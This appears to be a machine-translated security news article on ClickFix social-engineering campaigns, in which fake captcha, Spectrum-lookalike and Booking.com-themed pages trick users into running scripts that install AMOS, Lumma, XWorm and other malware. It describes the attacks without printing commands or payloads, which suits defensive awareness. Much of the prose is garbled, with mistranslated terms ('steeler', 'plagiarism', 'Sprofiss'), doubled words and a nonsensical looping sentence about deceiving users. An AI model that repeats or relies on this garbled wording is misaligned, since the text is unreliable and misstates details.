Cybersecurity researchers are warning against a new malware campaign that employs ClickFix social engineering tactics to download information steeler malware called Atomic Macos Stealer (AMOS) on Apple Macos Systems.
According to CloudSek, the campaign is known to harness the Typosquat domain by mimicking the US telecom provider spectrum.
“MACOS users will be provided with malicious shell scripts designed to steal system passwords and download AMOS variants for further exploitation,” security researcher Koushik Pal said in a report published this week. “This script uses native MacOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”
This activity is considered to be a work of Russian-speaking cybercriminals, as there are Russian comments in the source code of the malware.
The attack starts at a web page that is impersonating the spectrum (“PanelSpectrum(.)net” or “spectrum-ticket(.)net”). Visitors to the site in question will be provided with a message telling them to complete the hcaptcha validation check to “secur” the security of their connection before proceeding further.
However, when the user clicks on the “I Am Human” checkbox for evaluation, he receives an error message saying “Captcha validation failed” and prompts him to click the button to proceed with “Alternative validation”.
Doing so will copy the command to the user’s clipboard and the victim will receive a series of instructions, depending on the operating system. You are guided to open the Windows Run dialog and run PowerShell commands on Windows, but it will be replaced by a shell script that is run by launching the terminal app on MacOS.
For that part, the shell script prompts the user to enter the system password and downloads the payload for the next stage, a known steeler known as the Atomic Stealer.
“Insufficient logic at distribution sites, such as inter-platform indices of inconsistency, points to a hastily constructed infrastructure,” Pal said.
“The distribution page for this AMOS variant campaign issue contained inaccuracies in both programming and front-end logic. For Linux user agents, the PowerShell command was copied. Additionally, the instruction “hold Windows key + R” was displayed for both Windows and Mac users. ”
This disclosure comes amid the use of Clickfix tactics to surge in campaigns and provide a wide range of malware families over the past year.
“Actors who perform these target attacks usually use similar techniques, tools and procedures (TTP) to gain initial access,” Darktrace said. “These include providing malicious payloads to exploit spear phishing attacks, drive-by compromises, or to misuse trust in familiar online platforms such as GitHub.”
Links distributed using these vectors typically redirect end users to malicious URLs. This is actually because when you are led to run malicious commands to fix problems that do not exist, you are deceived to deceive users, and deceived to deceive users when you are led to run malicious commands to fix problems that do not exist.
The end result of this effective social engineering method is that users can compromise their own systems and allow threat actors to bypass security controls.
The cybersecurity company said it has identified multiple clickfix attacks across customer environments in Europe, the Middle East, Africa (EMEA) and the US. And while these campaigns have acquired steam and employ several variations, they operate with the same end goal of providing malicious payloads, ranging from Trojans to plagiarism to ransomware.
Earlier this week, Cofense outlined Booking.com’s email phishing campaign using Sprofiss Booking.com, and targeted the hotel chain and foodservice divisions with fake captures and targets leading to Xworm Rat, Purelogs Stealer and Danabot. The fact that Clickfix is flexible and easy to adapt makes it an attractive malware distribution mechanism.
“Although the exact email structure varies from sample to sample, these campaigns generally provide booking (.) comSpoofing emails with embedded links to Clickfix fake Captcha sites, which are used to deliver malicious scripts that run rats and information stolen items,” says Cofense.
The email security company also observed that the Clickfix sample mimics the cookie consent banner. Click the “Accept” button to download a malicious script file. The user is then asked to run the script to accept cookies.
One April 2025 incident analyzed by Darktrace uses Clickfix as an attack vector to dig deep into the target environment, perform lateral movements, and send system-related information to an external server via HTTP POST requests, and ultimately remove data data.
“Clickfix Baiting is a widely used tactic that threat actors leverage human error to bypass security defenses,” says Darktrace. “By tricking endpoint users to perform seemingly harmless and everyday actions, attackers gain initial access to systems that can access and scale sensitive data.”
Other Clickfix attacks use fake versions of other popular Captcha services, such as Google Recaptcha and CloudFlare Turnstile, to provide malware delivery under the guise of daily security checks.
These fake pages are “Pixel-Perfect copies” of legal counterparts, which can sometimes trick unsuspecting users into injected into actual hacked websites. Steelers like Lumma and Stealc, as well as full-fledged remote access trojans like Netsupport Rat, are part of the payload distributed via fake turnstyle pages.
“Modern Internet users are conditioned to click on spam checks, captures and security prompts on their websites as soon as possible,” said Daniel Kelley of Slashnext. “Attackers know that they will take advantage of this ‘validation fatigue’ and follow the steps presented when many users see it as everyday. ”
